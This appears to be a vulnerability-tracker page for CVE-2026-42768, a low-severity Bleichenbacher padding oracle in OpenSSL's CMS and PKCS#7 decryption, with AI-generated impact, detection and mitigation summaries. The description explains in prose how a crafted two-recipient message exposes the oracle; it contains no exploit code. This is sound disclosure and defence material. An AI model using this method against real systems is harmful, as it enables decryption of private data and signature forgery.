CVE-2026-42768
Awaiting Analysis Awaiting Analysis - Queue
Bleichenbacher Oracle in OpenSSL CMS Decryption

Publication date: 2026-06-09

Last updated on: 2026-06-09

Assigner: OpenSSL Software Foundation

Description
Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to Bleichenbacher-style attack when an attacker is able to provide the CMS or S/MIME messages and observe the error code and/or decryption output. Impact summary: The Bleichenbacher-style attack allows an attacker to use the victim's vulnerable application as a way to decrypt or sign messages with the victim's private RSA key. The attack is possible in 2 variants. 1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without providing the recipient certificate. In this case OpenSSL iterates over every KeyTransRecipientInfo (KTRI) without stopping at the first success. An attacker who authors a message with two KTRI entries β€” the first one wrapping a real CEK under the victim's public key, the second with an arbitrary probe ciphertext β€” obtains opportunity to iterate the 2nd KTRI to get a valid PKCS#1 v1.5 padding if the error code of the application is available. That is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an adaptive-chosen-ciphertext side channel from which the attacker decrypts any RSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under it. 2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with the recipient certificate, and the recipient is not found, a random key is substituted. An attacker who authors a message and is able to compare both error code and the result of the decryption, can mount a Bleichenbacher oracle. We are not aware of any applications that provide a remote attacker an opportunity to mount an attack described in these scenarios. We consider the existence of such application very unlikely, and for this reason this CVE has been evaluated as Low severity. To avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the invoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit rejection was explicitly disabled. The implicit rejection mechanism always returns a plaintext value, the symmetric key. This result is deterministic for the ciphertext and the private key. The length of the decryption result can happen to match the length of the key of the symmetric cipher that was used for the content encryption. When a certificate is not provided, the last RecipientInfo producing a key that looks valid will be used. It may cause getting garbage content on decryption. As a proper way to deal with this a recipient certificate has to be provided to identify the particular RecipientInfo for decryption. The FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as CMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-09
Last Modified
2026-06-09
Generated
2026-06-10
AI Q&A
2026-06-09
EPSS Evaluated
N/A
NVD
CVE-2026-42768
EUVD
EUVD-2026-35485
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
openssl openssl to 4.0 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-514 A covert channel is a path that can be used to transfer information in a way not intended by the system's designers.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Compliance Impact

The vulnerability described in CVE-2026-42768 allows an attacker to decrypt or sign messages using the victim's private RSA key through a Bleichenbacher-style attack on the CMS_decrypt and PKCS7_decrypt functions.

This could potentially lead to unauthorized access to sensitive encrypted data or the forging of signatures, which may impact the confidentiality and integrity of data protected under regulations such as GDPR and HIPAA.

However, the CVE notes that no known applications currently provide a remote attacker the opportunity to mount this attack, and the issue is rated as Low severity.

Additionally, the FIPS modules in OpenSSL versions 4.0, 3.6, 3.5, and 3.4 are not affected, as CMS and S/MIME processing occurs outside the FIPS module boundary.

Therefore, while the vulnerability could theoretically affect compliance by exposing sensitive encrypted data or allowing signature forgery, the practical risk is considered low due to the unlikely attack scenarios and mitigations.

Executive Summary

The vulnerability involves the CMS_decrypt and PKCS7_decrypt functions being susceptible to a Bleichenbacher-style attack. This attack allows an attacker who can provide CMS or S/MIME messages and observe error codes or decryption outputs to decrypt or sign messages using the victim's private RSA key.

There are two variants of the attack: one where the decryption API is used without providing the recipient certificate, allowing an attacker to iterate over multiple KeyTransRecipientInfo entries to find valid PKCS#1 v1.5 padding; and another where the API is provided with a recipient certificate but the recipient is not found, causing a random key substitution that can be exploited if error codes and decryption results are observable.

This attack exploits an adaptive-chosen-ciphertext side channel known as a Bleichenbacher oracle, enabling decryption of any RSA ciphertext or forging of PKCS#1 v1.5 signatures under the victim's key.

The issue is considered low severity because no known applications provide remote attackers the opportunity to mount this attack.

Impact Analysis

If exploited, this vulnerability allows an attacker to decrypt messages or forge signatures using the victim's private RSA key by leveraging the vulnerable decryption functions.

This could lead to unauthorized access to encrypted information or the ability to impersonate the victim by signing messages.

However, the likelihood of such an attack is considered very low due to the rarity of applications exposing the necessary conditions for the attack.

Detection Guidance

This vulnerability involves the CMS_decrypt and PKCS7_decrypt functions being vulnerable to a Bleichenbacher-style attack when an attacker can provide CMS or S/MIME messages and observe error codes or decryption output.

Detection would require monitoring for unusual error codes or decryption outputs when processing CMS or S/MIME messages, especially if the application uses RSA PKCS#1 v1.5 Key Transport without proper recipient certificate validation.

However, the provided context does not include specific commands or tools to detect this vulnerability on a network or system.

Mitigation Strategies

To mitigate this vulnerability, ensure that when using RSA PKCS#1 v1.5 Key Transport, the decryption API (CMS_decrypt(), PKCS7_decrypt()) is invoked with the recipient certificate provided to identify the particular RecipientInfo for decryption.

This prevents the attacker from exploiting the Bleichenbacher oracle by avoiding iteration over multiple KeyTransRecipientInfo entries.

Additionally, use OpenSSL versions where the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance is enabled, as this mechanism helps prevent the attack by always returning a deterministic plaintext value.

Note that FIPS modules in OpenSSL versions 4.0, 3.6, 3.5, and 3.4 are not affected by this issue.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-42768. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart